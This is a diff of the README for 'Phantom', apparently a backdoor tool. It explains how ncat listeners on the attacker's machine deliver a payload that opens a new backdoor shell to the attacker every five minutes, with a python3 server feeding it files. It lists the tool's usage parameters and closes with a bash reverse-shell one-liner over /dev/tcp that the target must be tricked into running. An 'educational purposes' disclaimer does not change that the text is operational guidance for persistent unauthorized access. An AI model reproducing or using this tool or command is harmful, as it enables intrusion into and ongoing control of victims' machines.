konsaranto/phantom/README.md

 **Phantom was created for educational purposes.
 Stay away from illegal activities.**

 Phantom uses ncat on the attacker's machine to listen for incoming connections from the target's machine.
-At first it opens an ncat connection to a port and when the target's machine connects to this port it delivers the payload.
-The payload opens a new backdoor shell every 5 minutes to the attacker's machine, but to a different port than the first one.
-So, essentially you need to specify two ports.
+At first it opens an ncat connection to a port (port1) and when the target's machine connects to this port it delivers the payload.
+The payload opens a new backdoor shell every 5 minutes to the attacker's machine, but to a different port than the first one (port2).
 The reason for this is that this way you have more control of what to do with the backdoor shell, otherwise the same payload gets executed each time the target connects to your machine.
+It also creates a python3 server listening to a third port (portp) that is needed to transfer the files needed by the payload.
+So, essentially, you have to specify three ports.

 ## Usage

 ```
-phantom-init  [ip=][port1=][port2=]
+phantom-init  [ip=][port1=][port2=][portp=]
 ```

 * ip: the attacker's ip (e.g. ip=127.0.0.1)
 * port1: the port that listens for connections to deliver the payload (e.g. port1=8888)
-* port2: the port that listens for the backdoor shells after delivering the payload (e.g. port2=9999)
+* port2: the port that listens for the backdoor shells after delivering the payload
+* portp: the port that the python3 server listens to transfer the functions and variables needed by the payload

 You have to somehow make the target execute this code, so that he connects to port1:
 **bash -c 'bash &>/dev/tcp/ip/port1 0>&1 &'**